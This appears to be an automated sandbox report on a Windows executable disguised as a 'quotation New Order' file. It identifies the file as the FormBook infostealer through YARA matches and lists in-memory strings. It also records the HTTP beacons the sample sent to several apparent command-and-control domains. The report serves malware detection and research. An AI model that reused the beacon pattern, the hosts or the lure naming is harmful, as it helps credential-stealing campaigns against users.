Source: quotation New Order I5117.exe, 00000001.00000003.279705644.0000000006496000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comOo
Source: quotation New Order I5117.exe, 00000001.00000003.279705644.0000000006496000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: quotation New Order I5117.exe, 00000001.00000003.279705644.0000000006496000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279897743.000000000649F000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comv-s
Source: quotation New Order I5117.exe, 00000001.00000002.304220539.0000000006490000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.299637951.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: quotation New Order I5117.exe, 00000001.00000003.287151718.0000000006497000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.287020911.0000000006496000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comF
Source: quotation New Order I5117.exe, 00000001.00000002.304220539.0000000006490000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.299637951.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comicTF
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: quotation New Order I5117.exe, 00000001.00000003.279107622.0000000006497000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279149208.000000000649B000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279061521.0000000006495000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: quotation New Order I5117.exe, 00000001.00000003.278846260.00000000064CD000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279061521.0000000006495000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: quotation New Order I5117.exe, 00000001.00000002.300826914.0000000001967000.00000004.00000040.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmU
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: quotation New Order I5117.exe, 00000001.00000003.278599921.0000000006493000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kra
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.indianasheriffs.biz/Accident_Lawyers.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdE
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.indianasheriffs.biz/Anti_Wrinkle_Creams.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpY
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.indianasheriffs.biz/Best_Mortgage_Rates.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpY
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.indianasheriffs.biz/Best_Penny_Stocks.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwd
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.indianasheriffs.biz/Contact_Lens.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdEgm29
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.indianasheriffs.biz/Healthy_Weight_Loss.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpY
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.indianasheriffs.biz/Online_classifieds.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYw
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.indianasheriffs.biz/Top_10_Luxury_Cars.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYw
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.indianasheriffs.biz/display.cfm
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.indianasheriffs.biz/fashion_trends.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdEgm
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.indianasheriffs.biz/find_a_tutor.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdEgm29
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.indianasheriffs.biz/song_lyrics.cfm?fp=NpGxw7H6oMg5%2BaTgzk5Hmw%2FREERTklQz665lpYwdEgm292
Source: quotation New Order I5117.exe, 00000001.00000003.280571715.000000000649A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: quotation New Order I5117.exe, 00000001.00000003.281350093.000000000649A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/G-
Source: quotation New Order I5117.exe, 00000001.00000003.281350093.000000000649A000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.281266227.000000000649A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/M
Source: quotation New Order I5117.exe, 00000001.00000003.281350093.000000000649A000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.281266227.000000000649A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/W
Source: quotation New Order I5117.exe, 00000001.00000003.281350093.000000000649A000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.281266227.000000000649A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/adnl
Source: quotation New Order I5117.exe, 00000001.00000003.280571715.000000000649A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/face
Source: quotation New Order I5117.exe, 00000001.00000003.281266227.000000000649A000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.282877904.000000000649E000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: quotation New Order I5117.exe, 00000001.00000003.280571715.000000000649A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ogra
Source: quotation New Order I5117.exe, 00000001.00000003.281350093.000000000649A000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.281266227.000000000649A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/s-c
Source: quotation New Order I5117.exe, 00000001.00000003.281266227.000000000649A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/sis
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.networksolutions.com/
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.networksolutions.com/legal/legal-notice.jsp
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.networksolutions.com/legal/static-service-agreement.jsp
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.register.com/?trkID=WSTm3u15CW
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: http://www.register.com?trkID=WSTm3u15CW
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: quotation New Order I5117.exe, 00000001.00000003.276699598.00000000064AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.comiv
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: quotation New Order I5117.exe, 00000001.00000003.278599921.0000000006493000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: quotation New Order I5117.exe, 00000001.00000003.278599921.0000000006493000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr.krL
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279168225.0000000006492000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: quotation New Order I5117.exe, 00000001.00000003.279107622.0000000006497000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279149208.000000000649B000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com_
Source: quotation New Order I5117.exe, 00000001.00000003.279107622.0000000006497000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comng
Source: quotation New Order I5117.exe, 00000001.00000003.277461034.0000000006494000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.net
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: quotation New Order I5117.exe, 00000001.00000003.279705644.0000000006496000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.304394444.0000000007722000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279634269.0000000006495000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000003.279897743.000000000649F000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: quotation New Order I5117.exe, 00000001.00000003.279634269.0000000006495000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cnl
Source: quotation New Order I5117.exe, 00000001.00000003.279634269.0000000006495000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cno.Eo
Source: cmd.exe, 00000011.00000002.547952171.0000000003E42000.00000004.00020000.sdmp	String found in binary or memory: https://www.register.com/whois.rcmx?domainName=Indianasheriffs.biz

Source: unknown

DNS traffic detected: queries for: www.zahad-riedel.com

Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=iaKVfi2UNf7U4ghXoaW8pCxH8k1QKwprWVQ4tf6BluLH39GjhhtZKTymn1Siq8RobrxN&Mtx=0PvL86-xjV HTTP/1.1Host: www.zahad-riedel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=7H0yjhDg+a+MHwvOt9FlC9FT4fPPwk985azmZpRe8o0S6swRDJgGtBdFue+HEp9ACtz2&Mtx=0PvL86-xjV HTTP/1.1Host: www.jypmore.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=c3mmtSef7XE9Y6LEpqTlZ9les/exvmn3T3lrgLyL2qaFXU4A/SjORTIHh9BJbvzbz9Lm&Mtx=0PvL86-xjV HTTP/1.1Host: www.indianasheriffs.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=dFscc3ADPHmy8TWVKvwCOMwU5bUrQa/CizHl44ZiWA9r2IP2TSl8LSycOCDTN0nOZKJt&Mtx=0PvL86-xjV HTTP/1.1Host: www.eduardoleonsilva.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=PuetlOwZFpkKGCq/MJJLd9AYausHszI4yXIJtu+5frxDpsbSPvktMbNWt5V8r6CNrXXm&Mtx=0PvL86-xjV HTTP/1.1Host: www.thetanheroes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=klWsC1oO4pFLOH/ubbPBsuuNG6ECcuE/tWLY9Ci8D79EoLLMyfySTrTS/TXNAHCZkRkB&Mtx=0PvL86-xjV HTTP/1.1Host: www.pinnaclecorporaterentals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8bs/?4hJLWJ=P1PWYcL+/hkTuAmEUVew+E7DjpBsgHpPBHkumuCE+t//nspYDrLxOzxmHnBKSVqws4Kv&Mtx=0PvL86-xjV HTTP/1.1Host: www.myveguiolcusbyopappgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.quotation New Order I5117.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.quotation New Order I5117.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 12.0.quotation New Order I5117.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.quotation New Order I5117.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.quotation New Order I5117.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.quotation New Order I5117.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.quotation New Order I5117.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.quotation New Order I5117.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.quotation New Order I5117.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.quotation New Order I5117.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.quotation New Order I5117.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.quotation New Order I5117.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.quotation New Order I5117.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.quotation New Order I5117.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.quotation New Order I5117.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.quotation New Order I5117.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: quotation New Order I5117.exe

Source: quotation New Order I5117.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 12.0.quotation New Order I5117.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.quotation New Order I5117.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.quotation New Order I5117.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.quotation New Order I5117.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.quotation New Order I5117.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.quotation New Order I5117.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.quotation New Order I5117.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.quotation New Order I5117.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.quotation New Order I5117.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.quotation New Order I5117.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.quotation New Order I5117.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.quotation New Order I5117.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.quotation New Order I5117.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.quotation New Order I5117.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
